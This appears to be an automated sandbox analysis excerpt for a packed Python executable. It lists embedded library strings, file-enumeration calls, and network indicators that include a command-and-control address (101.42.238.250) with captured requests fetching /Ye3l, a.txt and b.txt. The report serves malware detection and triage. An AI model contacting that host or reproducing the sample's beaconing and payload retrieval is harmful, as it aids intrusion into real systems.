        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880512904.00007FFE11ED9000.00000002.00000001.01000000.0000000E.sdmp, _socket.pyd.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: DChOtFdp9T.exe, 00000000.00000003.1683307278.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881008984.00007FFE130C5000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140_1.dll.0.dr
        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688752351.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmp
        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685695268.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmp
        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB13A000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: DChOtFdp9T.exe, 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687027078.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881098109.00007FFE13204000.00000002.00000001.01000000.0000000C.sdmp, _wmi.pyd.0.dr
        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686366365.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685177805.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880596191.00007FFE120C6000.00000002.00000001.01000000.00000016.sdmp
        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687394800.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683174444.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1882140131.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686035517.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687990709.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB13A000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686550010.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686216151.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880914876.00007FFE12E13000.00000002.00000001.01000000.0000000F.sdmp, select.pyd.0.dr
        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688827777.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686729797.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687253081.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686838745.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685584111.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880770005.00007FFE126EB000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688107451.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685966419.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880682032.00007FFE126C3000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881098109.00007FFE13204000.00000002.00000001.01000000.0000000C.sdmp, _wmi.pyd.0.dr
        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685896929.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872247576.0000017808110000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: D:\a\1\b\libssl-3.pdb source: DChOtFdp9T.exe, 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687837125.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688439421.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: DChOtFdp9T.exe, 00000001.00000002.1880262151.00007FFE1150D000.00000002.00000001.01000000.00000012.sdmp, _ssl.pyd.0.dr
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602998300 FindFirstFileExW,FindClose,0_2_00007FF602998300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602997900 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF602997900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B05F4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF602998300 FindFirstFileExW,FindClose,1_2_00007FF602998300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF602997900 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF602997900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF6029B05F4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A1B0 FindFirstFileExW,FindClose,FindNextFileW,1_2_00007FFE0079A1B0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A018 FindFirstFileExA,FindClose,FindNextFileA,1_2_00007FFE0079A018
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\

        Networking

        Source: Malware configuration extractorURLs: http://01.42.238.250:443/Ye3l
        Source: Malware configuration extractorURLs: http://101.42.238.250/Ye3l
        Source: Joe Sandbox ViewASN Name: CNIX-APChinaNetworksInter-ExchangeCN CNIX-APChinaNetworksInter-ExchangeCN
        Source: global trafficHTTP traffic detected: GET /Ye3l HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 101.42.238.250:443Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: global trafficHTTP traffic detected: GET /a.txt HTTP/1.1Host: 101.42.238.250User-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /b.txt HTTP/1.1Host: 101.42.238.250User-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
        Source: DChOtFdp9T.exe, 00000001.00000002.1874304688.000001780B8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
        Source: DChOtFdp9T.exe, 00000001.00000002.1874765026.000001780BC34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250/a.txt
        Source: DChOtFdp9T.exe, 00000001.00000002.1874765026.000001780BC34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250/b.txt
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250/b.txtng.utils
        Source: DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B2E0000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B2B5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250:443/Ye3l
        Source: DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250:443/Ye3l2G7cghlI
        Source: DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714174593.000001780A559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
        Source: DChOtFdp9T.exe, 00000000.00000003.1683854693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiC
        Source: DChOtFdp9T.exe, 00000000.00000003.1683854693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684554288.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CE2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696125909.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1697440616.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683712452.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696302683.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, 
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714923767.000001780A5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
        Source: DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yahoo.com/
        Source: DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
        Source: _cffi_backend.cp312-win_amd64.pyd.0.drString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://cryptography.io
        Source: METADATA.0.drString found in binary or memory: https://cryptography.io/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/changelog/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/installation/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/security/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
        Source: DChOtFdp9T.exe, 00000001.00000003.1707557533.0000017809BC9000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707484539.0000017809BB7000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872392888.0000017809A8C000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707484539.0000017809BA7000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
        Source: DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780BA74000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B20E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A616000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/openssl/openssl/blob/master/include/openssl/pem.h
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
        Source: METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/issues
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
        Source: DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
        Source: DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
        Source: DChOtFdp9T.exe, 00000001.00000002.1872660104.0000017809E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
        Source: DChOtFdp9T.exe, 00000001.00000002.1872392888.0000017809A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
        Source: DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
        Source: DChOtFdp9T.exe, 00000001.00000003.1710316814.000001780A0E6000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715918699.000001780A0B7000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1710387124.000001780A08B000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A063000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1710245144.000001780A0DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
        Source: DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues/396
        Source: DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues/396p
        Source: DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/497
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B6D000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
        Source: DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780BA50000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
        Source: DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
        Source: DChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A356000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
        Source: DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
        Source: DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
        Source: DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
        Source: DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A0FD000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715054087.000001780A108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
        Source: DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
        Source: DChOtFdp9T.exe, 00000001.00000002.1872868299.000001780A150000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
